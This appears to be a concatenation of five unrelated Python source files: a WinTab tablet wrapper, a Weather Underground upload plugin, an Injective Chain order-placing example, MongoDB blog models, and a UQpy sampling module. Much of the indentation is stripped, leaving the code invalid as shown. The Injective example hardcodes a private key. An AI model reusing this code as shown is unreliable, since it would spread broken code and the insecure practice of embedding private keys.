WTI_DEFSYSCTX = 4
WTI_DDCTXS = 400 # 1.1
WTI_DSCTXS = 500 # 1.1
CTX_NAME = 1
CTX_OPTIONS = 2
CTX_STATUS = 3
CTX_LOCKS = 4
CTX_MSGBASE = 5
CTX_DEVICE = 6
CTX_PKTRATE = 7
CTX_PKTDATA = 8
CTX_PKTMODE = 9
CTX_MOVEMASK = 10
CTX_BTNDNMASK = 11
CTX_BTNUPMASK = 12
CTX_INORGX = 13
CTX_INORGY = 14
CTX_INORGZ = 15
CTX_INEXTX = 16
CTX_INEXTY = 17
CTX_INEXTZ = 18
CTX_OUTORGX = 19
CTX_OUTORGY = 20
CTX_OUTORGZ = 21
CTX_OUTEXTX = 22
CTX_OUTEXTY = 23
CTX_OUTEXTZ = 24
CTX_SENSX = 25
CTX_SENSY = 26
CTX_SENSZ = 27
CTX_SYSMODE = 28
CTX_SYSORGX = 29
CTX_SYSORGY = 30
CTX_SYSEXTX = 31
CTX_SYSEXTY = 32
CTX_SYSSENSX = 33
CTX_SYSSENSY = 34
CTX_MAX = 34
WTI_DEVICES = 100
DVC_NAME = 1
DVC_HARDWARE = 2
DVC_NCSRTYPES = 3
DVC_FIRSTCSR = 4
DVC_PKTRATE = 5
DVC_PKTDATA = 6
DVC_PKTMODE = 7
DVC_CSRDATA = 8
DVC_XMARGIN = 9
DVC_YMARGIN = 10
DVC_ZMARGIN = 11
DVC_X = 12
DVC_Y = 13
DVC_Z = 14
DVC_NPRESSURE = 15
DVC_TPRESSURE = 16
DVC_ORIENTATION = 17
DVC_ROTATION = 18 # 1.1
DVC_PNPID = 19 # 1.1
DVC_MAX = 19
WTI_CURSORS = 200
CSR_NAME = 1
CSR_ACTIVE = 2
CSR_PKTDATA = 3
CSR_BUTTONS = 4
CSR_BUTTONBITS = 5
CSR_BTNNAMES = 6
CSR_BUTTONMAP = 7
CSR_SYSBTNMAP = 8
CSR_NPBUTTON = 9
CSR_NPBTNMARKS = 10
CSR_NPRESPONSE = 11
CSR_TPBUTTON = 12
CSR_TPBTNMARKS = 13
CSR_TPRESPONSE = 14
CSR_PHYSID = 15 # 1.1
CSR_MODE = 16 # 1.1
CSR_MINPKTDATA = 17 # 1.1
CSR_MINBUTTONS = 18 # 1.1
CSR_CAPABILITIES = 19 # 1.1
CSR_TYPE = 20 # 1.2
CSR_MAX = 20
WTI_EXTENSIONS = 300
EXT_NAME = 1
EXT_TAG = 2
EXT_MASK = 3
EXT_SIZE = 4
EXT_AXES = 5
EXT_DEFAULT = 6
EXT_DEFCONTEXT = 7
EXT_DEFSYSCTX = 8
EXT_CURSORS = 9
EXT_MAX = 109 # Allow 100 cursors
CXO_SYSTEM = 0x0001
CXO_PEN = 0x0002
CXO_MESSAGES = 0x0004
CXO_MARGIN = 0x8000
CXO_MGNINSIDE = 0x4000
CXO_CSRMESSAGES = 0x0008 # 1.1
# context status values
CXS_DISABLED = 0x0001
CXS_OBSCURED = 0x0002
CXS_ONTOP = 0x0004
# context lock values
CXL_INSIZE = 0x0001
CXL_INASPECT = 0x0002
CXL_SENSITIVITY = 0x0004
CXL_MARGIN = 0x0008
CXL_SYSOUT = 0x0010
# packet status values
TPS_PROXIMITY = 0x0001
TPS_QUEUE_ERR = 0x0002
TPS_MARGIN = 0x0004
TPS_GRAB = 0x0008
TPS_INVERT = 0x0010 # 1.1
TBN_NONE = 0
TBN_UP = 1
TBN_DOWN = 2
PKEXT_ABSOLUTE = 1
PKEXT_RELATIVE = 2
# Extension tags.
WTX_OBT = 0 # Out of bounds tracking
WTX_FKEYS = 1 # Function keys
WTX_TILT = 2 # Raw Cartesian tilt; 1.1
WTX_CSRMASK = 3 # select input by cursor type; 1.1
WTX_XBTNMASK = 4 # Extended button mask; 1.1
WTX_EXPKEYS = 5 # ExpressKeys; 1.3
def wtinfo(category, index, buffer):
size = lib.WTInfoW(category, index, None)
assert size <= ctypes.sizeof(buffer)
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer
def wtinfo_string(category, index):
size = lib.WTInfoW(category, index, None)
buffer = ctypes.create_unicode_buffer(size)
lib.WTInfoW(category, index, buffer)
return buffer.value
def wtinfo_uint(category, index):
buffer = UINT()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_word(category, index):
buffer = WORD()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_dword(category, index):
buffer = DWORD()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_wtpkt(category, index):
buffer = WTPKT()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_bool(category, index):
buffer = BOOL()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return bool(buffer.value)
class Device:
def __init__(self, index):
self._device = WTI_DEVICES + index
self.name = wtinfo_string(self._device, DVC_NAME).strip()
self.id = wtinfo_string(self._device, DVC_PNPID)
hardware = wtinfo_uint(self._device, DVC_HARDWARE)
phys_cursors = hardware & HWC_PHYSID_CURSORS
n_cursors = wtinfo_uint(self._device, DVC_NCSRTYPES)
first_cursor = wtinfo_uint(self._device, DVC_FIRSTCSR)
self.pressure_axis = wtinfo(self._device, DVC_NPRESSURE, AXIS())
self.cursors = list()
self._cursor_map = dict()
for i in range(n_cursors):
cursor = WintabCursor(self, i + first_cursor)
if not cursor.bogus:
self.cursors.append(cursor)
self._cursor_map[i + first_cursor] = cursor
def open(self, window):
return DeviceInstance(self, window)
class DeviceInstance(pyglet.event.EventDispatcher):
def __init__(self, device, window, msg_base=WT_DEFBASE):
        # Just use the system context, for similarity with OS X and XInput.
        # WTI_DEFCONTEXT detaches the mouse from the tablet, which is nice, but
        # not possible on OS X afaik.
self.device = device
self.window = window
self.context_info = context_info = LOGCONTEXT()
wtinfo(WTI_DEFSYSCTX, 0, context_info)
context_info.lcMsgBase = msg_base
context_info.lcOptions |= CXO_MESSAGES
# If you change this, change definition of PACKET also.
context_info.lcPktData = (
PK_CHANGED | PK_CURSOR | PK_BUTTONS | PK_X | PK_Y | PK_Z |
PK_NORMAL_PRESSURE | PK_TANGENT_PRESSURE | PK_ORIENTATION)
context_info.lcPktMode = 0 # All absolute
self._context = lib.WTOpenW(window._hwnd,
ctypes.byref(context_info), True)
if not self._context:
raise Exception("Couldn't open context")
window._event_handlers[msg_base + WT_PACKET] = self._event_wt_packet
window._event_handlers[msg_base + WT_PROXIMITY] = \
self._event_wt_proximity
self._current_cursor = None
self._pressure_scale = device.pressure_axis.get_scale()
self._pressure_bias = device.pressure_axis.get_bias()
def close(self):
lib.WTClose(self._context)
self._context = None
def _set_current_cursor(self, cursor_type):
if self._current_cursor:
self.dispatch_event('on_cursor_leave', self._current_cursor)
self._current_cursor = self.device._cursor_map.get(cursor_type, None)
if self._current_cursor:
self.dispatch_event('on_cursor_enter', self._current_cursor)
@pyglet.window.win32.Win32EventHandler(0)
def _event_wt_packet(self, msg, wParam, lParam):
if lParam != self._context:
return
packet = PACKET()
if lib.WTPacket(self._context, wParam, ctypes.byref(packet)) == 0:
return
if not packet.pkChanged:
return
window_x, window_y = self.window.get_location() # TODO cache on window
window_y = self.window.screen.height - window_y - self.window.height
x = packet.pkX - window_x
y = packet.pkY - window_y
pressure = (packet.pkNormalPressure + self._pressure_bias) * \
self._pressure_scale
if self._current_cursor is None:
self._set_current_cursor(packet.pkCursor)
self.dispatch_event('on_motion', self._current_cursor,
x, y, pressure)
@pyglet.window.win32.Win32EventHandler(0)
def _event_wt_proximity(self, msg, wParam, lParam):
if wParam != self._context:
return
if not lParam & 0xffff0000:
# Not a hardware proximity event
return
if not lParam & 0xffff:
# Going out
self.dispatch_event('on_cursor_leave', self._current_cursor)
# If going in, proximity event will be generated by next event, which
# can actually grab a cursor id.
self._current_cursor = None
DeviceInstance.register_event_type('on_cursor_enter')
DeviceInstance.register_event_type('on_cursor_leave')
DeviceInstance.register_event_type('on_motion')
class WintabCursor:
def __init__(self, device, index):
self.device = device
self._cursor = WTI_CURSORS + index
self.name = wtinfo_string(self._cursor, CSR_NAME).strip()
self.active = wtinfo_bool(self._cursor, CSR_ACTIVE)
pktdata = wtinfo_wtpkt(self._cursor, CSR_PKTDATA)
# A whole bunch of cursors are reported by the driver, but most of
# them are hogwash. Make sure a cursor has at least X and Y data
# before adding it to the device.
self.bogus = not (pktdata & PK_X and pktdata & PK_Y)
if self.bogus:
return
self.id = (wtinfo_dword(self._cursor, CSR_TYPE) << 32) | \
wtinfo_dword(self._cursor, CSR_PHYSID)
def __repr__(self):
return 'WintabCursor(%r)' % self.name
def check_version():
interface_name = wtinfo_string(WTI_INTERFACE, IFC_WINTABID)
spec_version = wtinfo_word(WTI_INTERFACE, IFC_SPECVERSION)
impl_version = wtinfo_word(WTI_INTERFACE, IFC_IMPLVERSION)
print('%s %d.%d (Spec %d.%d)' % (interface_name,
impl_version >> 8, impl_version & 0xff,
spec_version >> 8, spec_version & 0xff))
if spec_version < 0x101:
raise ImportError('Require WinTab specification 1.1 or later')
def get_devices():
n_devices = wtinfo_uint(WTI_INTERFACE, IFC_NDEVICES)
devices = [Device(i) for i in range(n_devices)]
return devices
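# Usage sketch (illustrative only; assumes a Win32 pyglet window and an attached
# WinTab tablet). It ties the pieces above together: check the driver version,
# enumerate devices, open the first one against a window and print motion events.
if __name__ == '__main__':
    check_version()
    _devices = get_devices()
    if _devices:
        _window = pyglet.window.Window()
        _instance = _devices[0].open(_window)
        @_instance.event
        def on_motion(cursor, x, y, pressure):
            print('%r x=%.1f y=%.1f pressure=%.3f' % (cursor, x, y, pressure))
        pyglet.app.run()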
|
py | 1a3453cf2c44fb3eb6286a073c15fb0ccd270149 | import urllib2
import logging
import stormberry.plugin
from urllib import urlencode
class WundergroundUploader(stormberry.plugin.IRepositoryPlugin):
def store_reading(self, data):
"""Internal. Continuously uploads new sensors values to Weather Underground."""
print('Uploading data to Weather Underground')
# Build a weather data object http://wiki.wunderground.com/index.php/PWS_-_Upload_Protocol
weather_data = {
'action': 'updateraw',
'ID': self.config['WUNDERGROUND']['STATION_ID'],
'PASSWORD': self.config['WUNDERGROUND']['STATION_KEY'],
'dateutc': 'now',
'tempf': data.tempf,
'humidity': data.humidity,
'baromin': data.pressure_inHg,
'dewptf': data.dewpointf
}
try:
upload_url = self.config['WUNDERGROUND']['WU_URL'] + '?' + urlencode(weather_data)
response = urllib2.urlopen(upload_url)
html = response.read()
print('Server response: ', html)
# Close response object
response.close()
return True
except:
print('Could not upload to Weather Underground')
logging.warning('Could not upload to Weather Underground', exc_info=True)
return False
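# Illustrative sketch (not part of the plugin): the reading passed to
# store_reading() only needs the four attributes used above, and self.config is
# expected to carry a 'WUNDERGROUND' section with WU_URL, STATION_ID and
# STATION_KEY. The values below are placeholders; construction and config wiring
# are normally handled by stormberry itself.
class _ExampleReading(object):
    tempf = 72.5
    humidity = 40.0
    pressure_inHg = 29.92
    dewpointf = 46.8
# uploader = WundergroundUploader(...)  # constructed by the stormberry framework
# uploader.config = {'WUNDERGROUND': {'WU_URL': 'https://example.invalid/updateweatherstation.php',
#                                     'STATION_ID': 'KXXYYYY1',
#                                     'STATION_KEY': 'secret'}}
# uploader.store_reading(_ExampleReading())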
|
py | 1a34548459d377a46a8088c85728d2ac3cb66085 | # Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Chain Tx/Query client for Python. Example only."""
import asyncio
import logging
from pyinjective.composer import Composer as ProtoMsgComposer
from pyinjective.client import Client
from pyinjective.transaction import Transaction
from pyinjective.constant import Network
from pyinjective.wallet import PrivateKey, PublicKey, Address
async def main() -> None:
# select network: local, testnet, mainnet
network = Network.testnet()
composer = ProtoMsgComposer(network=network.string())
# initialize grpc client
client = Client(network, insecure=True)
# load account
priv_key = PrivateKey.from_hex("5d386fbdbf11f1141010f81a46b40f94887367562bd33b452bbaa6ce1cd1381e")
pub_key = priv_key.to_public_key()
address = pub_key.to_address().init_num_seq(network.lcd_endpoint)
subaccount_id = address.get_subaccount_id(index=0)
# prepare trade info
market_id = "0xd0f46edfba58827fe692aab7c8d46395d1696239fdf6aeddfa668b73ca82ea30"
fee_recipient = "inj1hkhdaj2a2clmq5jq6mspsggqs32vynpk228q3r"
# prepare tx msg
msg = composer.MsgCreateDerivativeMarketOrder(
sender=address.to_acc_bech32(),
market_id=market_id,
subaccount_id=subaccount_id,
fee_recipient=fee_recipient,
price=60000,
quantity=0.01,
leverage=3,
is_buy=True
)
# build sim tx
tx = (
Transaction()
.with_messages(msg)
.with_sequence(address.get_sequence())
.with_account_num(address.get_number())
.with_chain_id(network.chain_id)
)
sim_sign_doc = tx.get_sign_doc(pub_key)
sim_sig = priv_key.sign(sim_sign_doc.SerializeToString())
sim_tx_raw_bytes = tx.get_tx_data(sim_sig, pub_key)
# simulate tx
(simRes, success) = client.simulate_tx(sim_tx_raw_bytes)
if not success:
print(simRes)
return
sim_res_msg = ProtoMsgComposer.MsgResponses(simRes.result.data, simulation=True)
print("simulation msg response")
print(sim_res_msg)
# build tx
gas_price = 500000000
gas_limit = simRes.gas_info.gas_used + 15000 # add 15k for gas, fee computation
fee = [composer.Coin(
amount=gas_price * gas_limit,
denom=network.fee_denom,
)]
current_height = client.get_latest_block().block.header.height
tx = tx.with_gas(gas_limit).with_fee(fee).with_memo("").with_timeout_height(current_height+50)
sign_doc = tx.get_sign_doc(pub_key)
sig = priv_key.sign(sign_doc.SerializeToString())
tx_raw_bytes = tx.get_tx_data(sig, pub_key)
# broadcast tx: send_tx_async_mode, send_tx_sync_mode, send_tx_block_mode
res = client.send_tx_block_mode(tx_raw_bytes)
res_msg = ProtoMsgComposer.MsgResponses(res.data)
print("tx response")
print(res)
print("tx msg response")
print(res_msg)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
|
py | 1a34552198cdec8eb87a211e446607e4ef508e02 | # -*- coding: utf-8 -*-
"""
blog
~~~~~~~~~~~~~~
blog definition.
:copyright: (c) 2016 by fengweimin.
:date: 16/8/16
"""
from datetime import datetime
from bson.objectid import ObjectId
from werkzeug.utils import cached_property
from app.extensions import mdb
from app.models import User
from app.mongosupport import Model
@mdb.register
class Tag(Model):
__collection__ = 'tags'
structure = {
'name': unicode,
'weight': int,
'createTime': datetime,
}
required_fields = ['name', 'weight', 'createTime']
default_values = {'weight': 0, 'createTime': datetime.now}
indexes = [{'fields': ['name'], 'unique': True}]
@mdb.register
class Post(Model):
__collection__ = 'posts'
structure = {
'uid': ObjectId,
'pics': [unicode],
'title': unicode,
'body': unicode,
        'tids': [ObjectId],  # related tags
'createTime': datetime,
'viewTimes': int,
'comments': [{
'id': int,
            'uid': ObjectId,  # comment author
'content': unicode,
'time': datetime,
'replys': [{
                'uid': ObjectId,  # user posting the reply
                'rid': ObjectId,  # user receiving the reply
'content': unicode,
'time': datetime
}]
}]
}
required_fields = ['uid', 'title', 'body', 'tids', 'createTime']
default_values = {'createTime': datetime.now, 'viewTimes': 0}
indexes = [{'fields': 'tids'}, {'fields': 'createTime'}]
@cached_property
def author(self):
author = User.find_one({'_id': self.uid})
return author
@cached_property
def tags(self):
ids = list(self.tids)
tag_dict = {t._id: t for t in Tag.find({'_id': {'$in': ids}})}
return [tag_dict[id] for id in ids if id in tag_dict]
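# Minimal sketch (illustrative, not part of the models): a plain dict shaped like
# Post.structure, showing how the nested comments/replys lists are laid out.
# Persisting it through the mongosupport Model API is not shown here.
def _example_post_document(uid, tids):
    now = datetime.now()
    return {
        'uid': uid,                    # ObjectId of the author
        'pics': [u'cover.jpg'],
        'title': u'Hello',
        'body': u'First post',
        'tids': tids,                  # list of Tag ObjectIds
        'createTime': now,
        'viewTimes': 0,
        'comments': [{
            'id': 1,
            'uid': uid,                # comment author
            'content': u'Nice post',
            'time': now,
            'replys': [],
        }],
    }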
|
py | 1a3455e2c8f1c28a1b5a8b75f7074c1334a2652b | """This module contains functionality for all the sampling methods supported in UQpy."""
import sys
import copy
import numpy as np
from scipy.spatial.distance import pdist
import scipy.stats as sp
import random
from UQpy.Distributions import *
import warnings
def init_sm(data):
################################################################################################################
# Add available sampling methods Here
valid_methods = ['mcs', 'lhs', 'mcmc', 'pss', 'sts', 'SuS']
################################################################################################################
# Check if requested method is available
if 'method' in data:
if data['method'] not in valid_methods:
raise NotImplementedError("method - %s not available" % data['method'])
else:
raise NotImplementedError("No sampling method was provided")
################################################################################################################
# Monte Carlo simulation block.
# Mandatory properties(4): 1. Number of parameters, 2. distribution, 3. distribution parameters 4. Number of samples
# Optional properties(0):
if data['method'] == 'mcs':
# Mandatory
if 'number of samples' not in data:
data['number of samples'] = None
if 'distribution type' not in data:
raise NotImplementedError("Distributions not defined. Exit code")
if 'distribution parameters' not in data:
raise NotImplementedError("Distribution parameters not provided. Exit code")
if 'number of parameters' not in data:
data['number of parameters'] = None
################################################################################################################
# Latin Hypercube simulation block.
# Mandatory properties(4): 1. Number of parameters, 2. distribution, 3. distribution parameters 4. Number of samples
# Optional properties(3): 1. Criterion, 2. Metric, 3. Iterations
if data['method'] == 'lhs':
# Mandatory
if 'number of parameters' not in data:
data['number of parameters'] = None
if 'number of samples' not in data:
data['number of samples'] = None
if 'distribution type' not in data:
raise NotImplementedError("Exit code: Distributions not defined.")
if 'distribution parameters' not in data:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
# Optional
if 'criterion' not in data:
data['criterion'] = None
if 'distance' not in data:
data['distance'] = None
if 'iterations' not in data:
data['iterations'] = None
####################################################################################################################
# Markov Chain Monte Carlo simulation block.
# Mandatory properties(4): 1. target distribution, 2. target distribution parameters, 3. Number of samples,
# 4. Number of parameters
# Optional properties(5): 1. Proposal distribution, 2. proposal width, 3. Seed, 4. skip samples (avoid burn-in),
# 5. algorithm
if data['method'] == 'mcmc':
# Mandatory
if 'number of parameters' not in data:
raise NotImplementedError('Exit code: Number of parameters not defined.')
if 'target distribution type' not in data:
raise NotImplementedError("Exit code: Target distribution type not defined.")
if 'target distribution parameters' not in data:
raise NotImplementedError("Exit code: Target distribution parameters not defined.")
if 'number of samples' not in data:
raise NotImplementedError('Exit code: Number of samples not defined.')
# Optional
if 'seed' not in data:
data['seed'] = None
if 'skip' not in data:
data['skip'] = None
if 'proposal distribution type' not in data:
data['proposal distribution type'] = None
#else:
# if data['proposal distribution type'] not in ['Uniform', 'Normal']:
# raise ValueError('Exit code: Unrecognized type of proposal distribution type. Supported distributions: '
# 'Uniform, '
# 'Normal.')
if 'proposal distribution width' not in data:
data['proposal distribution width'] = None
if 'algorithm' not in data:
data['algorithm'] = None
################################################################################################################
# Partially stratified sampling block.
# Mandatory properties (4): 1. distribution, 2. distribution parameters, 3. design, 4. strata
# Optional properties(1): 1. Number of parameters
if data['method'] == 'pss':
# Mandatory
if 'distribution type' not in data:
raise NotImplementedError("Exit code: Distributions not defined.")
elif 'distribution parameters' not in data:
raise NotImplementedError("Exit code: distribution parameters not defined.")
if 'design' not in data:
raise NotImplementedError("Exit code: pss design not defined.")
if 'strata' not in data:
raise NotImplementedError("Exit code: pss strata not defined.")
# Optional
if 'number of parameters' not in data:
data['number of parameters'] = None
################################################################################################################
# Stratified sampling block.
# Mandatory properties(3): 1. distribution, 2. distribution parameters, 3. design
# Optional properties(1): 1. Number of parameters
if data['method'] == 'sts':
# Mandatory
if 'distribution type' not in data:
raise NotImplementedError("Exit code: Distributions not defined.")
elif 'distribution parameters' not in data:
raise NotImplementedError("Exit code: distribution parameters not defined.")
if 'design' not in data:
raise NotImplementedError("Exit code: sts design not defined.")
# Optional
if 'number of parameters' not in data:
data['number of parameters'] = None
####################################################################################################################
# Stochastic reduced order model block
# Mandatory properties(2): 1. moments, 2. error function weights
# Optional properties(2): 1.properties to match, 2. sample weights
# if 'SROM' in data and data['SROM'] is True:
# # Mandatory
# if 'moments' not in data:
# raise NotImplementedError("Exit code: Moments not provided.")
# if 'error function weights' not in data:
# raise NotImplementedError("Exit code: Error function weights not provided.")
#
# # Optional
# if 'properties to match' not in data:
# data['properties to match'] = None
# if 'correlation' not in data:
# data['correlation'] = None
# if 'weights for distribution' not in data:
# data['weights for distribution'] = None
# if 'weights for moments' not in data:
# data['weights for moments'] = None
# if 'weights for correlation' not in data:
# data['weights for correlation'] = None
####################################################################################################################
# Check any NEW METHOD HERE
#
#
####################################################################################################################
# Check any NEW METHOD HERE
#
#
########################################################################################################################
########################################################################################################################
########################################################################################################################
def run_sm(data):
################################################################################################################
# Run Monte Carlo simulation
if data['method'] == 'mcs':
print("\nRunning %k \n", data['method'])
rvs = MCS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'],
nsamples=data['number of samples'])
################################################################################################################
# Run Latin Hypercube sampling
elif data['method'] == 'lhs':
print("\nRunning %k \n", data['method'])
rvs = LHS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'],
nsamples=data['number of samples'], lhs_metric=data['distance'],
lhs_iter=data['iterations'], lhs_criterion=data['criterion'])
################################################################################################################
# Run partially stratified sampling
elif data['method'] == 'pss':
print("\nRunning %k \n", data['method'])
rvs = PSS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'],
pss_design=data['design'], pss_strata=data['strata'])
################################################################################################################
# Run STS sampling
elif data['method'] == 'sts':
print("\nRunning %k \n", data['method'])
rvs = STS(dimension=data['number of parameters'], pdf_type=data['distribution type'],
pdf_params=data['distribution parameters'], sts_design=data['design'])
################################################################################################################
# Run Markov Chain Monte Carlo sampling
elif data['method'] == 'mcmc':
print("\nRunning %k \n", data['method'])
rvs = MCMC(dimension=data['number of parameters'], pdf_target_type=data['target distribution type'],
algorithm=data['algorithm'], pdf_proposal_type=data['proposal distribution type'],
pdf_proposal_width=data['proposal distribution width'],
pdf_target_params=data['target distribution parameters'], seed=data['seed'],
skip=data['skip'], nsamples=data['number of samples'])
################################################################################################################
# Run Stochastic Reduce Order Model
# if 'SROM' in data:
# if data['SROM'] == 'Yes':
# print("\nImplementing SROM to samples")
# rvs = SROM(samples=rvs.samples, pdf_type=data['distribution type'], moments=data['moments'],
# weights_errors=data['error function weights'],
# weights_distribution=data['weights for distribution'],
# weights_moments=data['weights for moments'],
# weights_correlation=data['weights for correlation'], properties=data['properties to match'],
# pdf_params=data['distribution parameters'], correlation=data['correlation'])
################################################################################################################
# Run ANY NEW METHOD HERE
return rvs
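# Illustrative input (not part of the original module): the 'data' dictionary
# that init_sm()/run_sm() expect, shown here for the 'lhs' method. The [0, 1]
# convention for the Uniform parameters is an assumption about how inv_cdf()
# in UQpy.Distributions interprets pdf_params.
def _example_run_sm():
    data = {
        'method': 'lhs',
        'number of parameters': 2,
        'number of samples': 100,
        'distribution type': ['Uniform', 'Uniform'],
        'distribution parameters': [[0, 1], [0, 1]],
        'criterion': 'maximin',
        'distance': 'euclidean',
        'iterations': 50,
    }
    init_sm(data)
    return run_sm(data)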
########################################################################################################################
########################################################################################################################
# Monte Carlo simulation
########################################################################################################################
class MCS:
"""
    A class used to perform brute-force Monte Carlo sampling (MCS).
    samplesU01 lie in the unit hypercube [0, 1]^n, while samples lie in the parameter space.
:param dimension: Number of parameters
:type dimension: int
:param nsamples: Number of samples to be generated
:type nsamples: int
:param pdf_type: Type of distributions
:type pdf_type: list
:param pdf_params: Distribution parameters
:type pdf_params: list
"""
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, nsamples=None):
self.dimension = dimension
self.nsamples = nsamples
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.init_mcs()
self.samplesU01, self.samples = self.run_mcs()
def run_mcs(self):
samples = np.random.rand(self.nsamples, self.dimension)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
################################################################################################################
# Initialize Monte Carlo simulation.
# Necessary parameters: 1. Probability distribution, 2. Probability distribution parameters 3. Number of samples
# Optional: dimension, names of random variables
def init_mcs(self):
if self.nsamples is None:
raise NotImplementedError("Exit code: Number of samples not defined.")
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distributions not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
"Supported distributions: 'Uniform', 'Normal', 'Lognormal', "
"'Weibull', 'Beta', 'Exponential', 'Gamma'. ")
if self.pdf_params is None:
raise NotImplementedError("Exit code: Distribution parameters not defined.")
if self.dimension is None:
if len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
else:
self.dimension = len(self.pdf_type)
else:
import itertools
from itertools import chain
if len(self.pdf_type) == 1 and len(self.pdf_params) == self.dimension:
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == self.dimension:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_params) == 1 and len(self.pdf_type) == 1:
self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions")
########################################################################################################################
########################################################################################################################
# Latin hypercube sampling (LHS)
########################################################################################################################
class LHS:
"""
    A class that creates a Latin hypercube design for experiments.
    samplesU01 lie in the unit hypercube [0, 1]^n, while samples lie in the parameter space.
:param pdf_type: Distribution of the parameters
:type pdf_type: list
:param pdf_params: Distribution parameters
:type pdf_params: list
:param lhs_criterion: The criterion for generating sample points
Options:
1. random - completely random \n
2. centered - points only at the centre \n
3. maximin - maximising the minimum distance between points \n
4. correlate - minimizing the correlation between the points \n
:type lhs_criterion: str
    :param lhs_iter: The number of iterations to run. Only used for the maximin and correlate criteria
:type lhs_iter: int
:param lhs_metric: The distance metric to use. Supported metrics are
'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation', 'cosine', 'dice', \n
'euclidean', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis', 'matching', 'minkowski', \n
'rogerstanimoto', 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean', \n
'yule'.
:type lhs_metric: str
"""
def __init__(self, dimension=None, pdf_type=None, pdf_params=None, lhs_criterion=None, lhs_metric=None,
lhs_iter=None, nsamples=None):
self.dimension = dimension
self.nsamples = nsamples
self.pdf_type = pdf_type
self.pdf_params = pdf_params
self.lhs_criterion = lhs_criterion
self.lhs_metric = lhs_metric
self.lhs_iter = lhs_iter
self.init_lhs()
self.samplesU01, self.samples = self.run_lhs()
def run_lhs(self):
print('Running LHS for ' + str(self.lhs_iter) + ' iterations')
cut = np.linspace(0, 1, self.nsamples + 1)
a = cut[:self.nsamples]
b = cut[1:self.nsamples + 1]
if self.lhs_criterion == 'random':
samples = self._random(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
elif self.lhs_criterion == 'centered':
samples = self._centered(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
elif self.lhs_criterion == 'maximin':
samples = self._max_min(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
elif self.lhs_criterion == 'correlate':
samples = self._correlate(a, b)
samples_u_to_x = inv_cdf(samples, self.pdf_type, self.pdf_params)
return samples, samples_u_to_x
def _random(self, a, b):
"""
:return: The samples points for the random LHS design
"""
u = np.random.rand(self.nsamples, self.dimension)
samples = np.zeros_like(u)
for i in range(self.dimension):
samples[:, i] = u[:, i] * (b - a) + a
for j in range(self.dimension):
order = np.random.permutation(self.nsamples)
samples[:, j] = samples[order, j]
return samples
def _centered(self, a, b):
samples = np.zeros([self.nsamples, self.dimension])
centers = (a + b) / 2
for i in range(self.dimension):
samples[:, i] = np.random.permutation(centers)
return samples
def _max_min(self, a, b):
max_min_dist = 0
samples = self._random(a, b)
for _ in range(self.lhs_iter):
samples_try = self._random(a, b)
d = pdist(samples_try, metric=self.lhs_metric)
if max_min_dist < np.min(d):
max_min_dist = np.min(d)
samples = copy.deepcopy(samples_try)
print('Achieved max_min distance of ', max_min_dist)
return samples
def _correlate(self, a, b):
min_corr = np.inf
samples = self._random(a, b)
for _ in range(self.lhs_iter):
samples_try = self._random(a, b)
R = np.corrcoef(np.transpose(samples_try))
np.fill_diagonal(R, 1)
R1 = R[R != 1]
if np.max(np.abs(R1)) < min_corr:
min_corr = np.max(np.abs(R1))
samples = copy.deepcopy(samples_try)
print('Achieved minimum correlation of ', min_corr)
return samples
################################################################################################################
# Latin hypercube checks.
# Necessary parameters: 1. Probability distribution, 2. Probability distribution parameters
# Optional: number of samples (default 100), criterion, metric, iterations
def init_lhs(self):
if self.nsamples is None:
raise NotImplementedError("Exit code: Number of samples not defined.")
if self.pdf_type is None:
raise NotImplementedError("Exit code: Distributions not defined.")
else:
for i in self.pdf_type:
if i not in ['Uniform', 'Normal', 'Lognormal', 'Weibull', 'Beta', 'Exponential', 'Gamma']:
raise NotImplementedError("Exit code: Unrecognized type of distribution."
